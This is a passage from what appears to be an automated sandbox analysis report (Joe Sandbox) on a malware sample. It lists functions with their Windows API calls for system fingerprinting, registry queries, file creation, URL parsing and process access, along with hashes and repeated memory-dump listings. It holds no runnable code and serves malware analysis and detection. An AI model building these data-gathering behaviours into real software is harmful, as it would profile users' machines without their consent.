                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1859398019-0
                                                                                                                                                                        • Opcode ID: d8effb706a6b9e48797525c297f4d28f9039ce6b499cb6a3b657c4b074c640f5
                                                                                                                                                                        • Instruction ID: 6028f03cd4c72310d19a15e2dc7475317a1dd1a850ea5dc4a47fbf9073d75dbb
                                                                                                                                                                        • Opcode Fuzzy Hash: d8effb706a6b9e48797525c297f4d28f9039ce6b499cb6a3b657c4b074c640f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0F673381324B7E22132752C5EFBB5A6CAB45FA2F204010F309FB2C0D7659A459BB4
                                                                                                                                                                        Function 00191659 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 001923AA: malloc.MSVCRT ref: 001923AF
                                                                                                                                                                          • Part of subcall function 001923AA: strncpy.MSVCRT ref: 001923C0
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                                                                                        • Opcode ID: 52e71de14b04bd7c0a9a06e18cb66920f03f340dc8b14b45fe098532d85e6e04
                                                                                                                                                                        • Instruction ID: c9c641c6de6963628c2b086e092470495bed854a07ac2aed93c8baa44d036881
                                                                                                                                                                        • Opcode Fuzzy Hash: 52e71de14b04bd7c0a9a06e18cb66920f03f340dc8b14b45fe098532d85e6e04
                                                                                                                                                                        • Instruction Fuzzy Hash: 82112E76A00228ABDF12FB64DC85BDDB3B8AB28300F4004A6FA45E7151DB74AF848F50
                                                                                                                                                                        Function 0019BC66 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0019CC33,?,0019CCC1,00000000,06400000,00000003,00000000,001975C1,.exe,001B6C64), ref: 0019BCB3
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0019CC33,?,0019CCC1,00000000,06400000,00000003,00000000), ref: 0019BCEB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreatePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2024441833-0
                                                                                                                                                                        • Opcode ID: 0c3a2d90382103f13b56e25044f2fe69d7926029c6aa9c8c67317950ff340161
                                                                                                                                                                        • Instruction ID: 357452fe9f3fe5667cbc782d91bfca8825e303a57c7dee2d45cb7e0394dcd6f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c3a2d90382103f13b56e25044f2fe69d7926029c6aa9c8c67317950ff340161
                                                                                                                                                                        • Instruction Fuzzy Hash: B83194B0508B45DFDF349F65AAC4B677AE8EB1475CF108B2EF19B82980D330A884CB51
                                                                                                                                                                        Function 00184AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274457161-0
                                                                                                                                                                        • Opcode ID: 8623486b9572516f7c8f8c19fe6d49ada99dceb963f2b8d9a5204d90b1caebc0
                                                                                                                                                                        • Instruction ID: a34de3fee7b008c8b438edc91f22b8543eed7c16db92fc5f554c9bef4b6ae701
                                                                                                                                                                        • Opcode Fuzzy Hash: 8623486b9572516f7c8f8c19fe6d49ada99dceb963f2b8d9a5204d90b1caebc0
                                                                                                                                                                        • Instruction Fuzzy Hash: F5015E31D00218ABCB05ABA9EC45ADEBFB8EF55330F108216F925E72E0DB7056018F94
                                                                                                                                                                        Function 00190F26 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934), ref: 00190F3A
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F41
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ), ref: 00190F5F
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000), ref: 00190F7B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                        • Opcode ID: aad0cacb4bd7f41591c4b2db16d8328ba387db15b84bbc00d9f0170b6691b07f
                                                                                                                                                                        • Instruction ID: 380235bb6bb2f8a8c13c6a8f54e93eb05a873860c13ca6425debee51221dc7c2
                                                                                                                                                                        • Opcode Fuzzy Hash: aad0cacb4bd7f41591c4b2db16d8328ba387db15b84bbc00d9f0170b6691b07f
                                                                                                                                                                        • Instruction Fuzzy Hash: 68F03075641304FFEB126B91EC0AFAA7F7DEB44B01F140115F701A90A0D7B19A409B20
                                                                                                                                                                        Function 00196ED9 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00196F40
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4198075804-0
                                                                                                                                                                        • Opcode ID: b472355484f62b0bbe4d8416573849b503e83f8f4b293f11e2bf96b9e2184377
                                                                                                                                                                        • Instruction ID: 81b7c8711d9ead2975a7c8d299fd3e6904e4754de0ae7d8befa0a3e1997129c8
                                                                                                                                                                        • Opcode Fuzzy Hash: b472355484f62b0bbe4d8416573849b503e83f8f4b293f11e2bf96b9e2184377
                                                                                                                                                                        • Instruction Fuzzy Hash: 3621E47690011DABDF02EF64EC868DEBBB8FF54354F114126F916A7151D730AE86CBA0
                                                                                                                                                                        Function 0019221F Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00193E2A,00000000,?), ref: 00192241
                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0019225C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00192263
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
